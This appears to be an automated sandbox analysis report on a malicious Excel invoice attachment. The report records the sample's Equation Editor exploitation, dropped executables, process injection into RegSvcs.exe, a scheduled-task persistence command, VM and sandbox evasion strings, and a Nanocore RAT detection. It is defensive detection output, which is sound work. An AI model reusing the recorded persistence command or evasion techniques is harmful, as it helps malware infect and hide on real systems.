Source: C:\Users\Public\vbc.exe Code function: 4_2_011DA0AC push es; retf 4_2_011DA272
Source: C:\Users\Public\vbc.exe Code function: 4_2_011DA2FE push es; retf 4_2_011DA30E
Source: C:\Users\Public\vbc.exe Code function: 4_2_011DA274 push es; retf 4_2_011DA28A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00146D35 push esp; retf 4_2_00146D36
Source: C:\Users\Public\vbc.exe Code function: 4_2_00147FF9 push esp; retf 4_2_00147FFA
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EC4B5 push CCFFFFFEh; ret 4_2_002EC4BA
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EC55D push edi; retf 4_2_002EC563
Source: C:\Users\Public\vbc.exe Code function: 4_2_002ECE17 push esp; retf 4_2_002ECE19
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_001A5E25 push esp; retf 7_2_001A5E26
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_001A9D62 push eax; retf 7_2_001A9D65
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_001A9D66 pushad ; retf 7_2_001A9D69
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_001A989B push ecx; retf 001Ah 7_2_001A98A1
Source: initial sample Static PE information: section name: .text entropy: 7.9540154939
Source: initial sample Static PE information: section name: .text entropy: 7.9540154939
Source: initial sample Static PE information: section name: .text entropy: 7.9540154939
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\gmSlQSien.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe File created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx Stream path 'EncryptedPackage' entropy: 7.9998366813 (max. 8.0)

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.26b2ea0.3.raw.unpack, type: UNPACKEDPE
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Window / User API: threadDelayed 546 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2388 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2388 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2488 Thread sleep time: -104850s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2656 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2272 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 1100 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_004F0D66 GetSystemInfo, 7_2_004F0D66
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 104850 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2193832055.000000000056C000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processes
Source: C:\Users\Public\vbc.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000 Jump to behavior
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 420000 Jump to behavior
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 422000 Jump to behavior
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 7EFDE008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Jump to behavior
Source: RegSvcs.exe, 00000007.00000002.2394933863.0000000002814000.00000004.00000001.sdmp Binary or memory string: Program ManagerH
Source: RegSvcs.exe, 00000007.00000002.2394140607.0000000000D30000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000007.00000002.2394140607.0000000000D30000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 00000007.00000002.2394977223.000000000285A000.00000004.00000001.sdmp Binary or memory string: Program Managera
Source: RegSvcs.exe, 00000007.00000002.2394140607.0000000000D30000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: RegSvcs.exe, 00000007.00000002.2393868574.00000000006A8000.00000004.00000020.sdmp Binary or memory string: FoProgram Manager8
Source: RegSvcs.exe, 00000007.00000002.2393868574.00000000006A8000.00000004.00000020.sdmp Binary or memory string: Program Manager- SOL2021-03-14-NETC-NI-21-049-CEVA INV - SOL2021-03-14-NETC-NI-21-049-CEVA INV:2
Source: RegSvcs.exe, 00000007.00000002.2394933863.0000000002814000.00000004.00000001.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Nanocore RAT
Source: Yara match File source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY
Source: Yara match File source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE
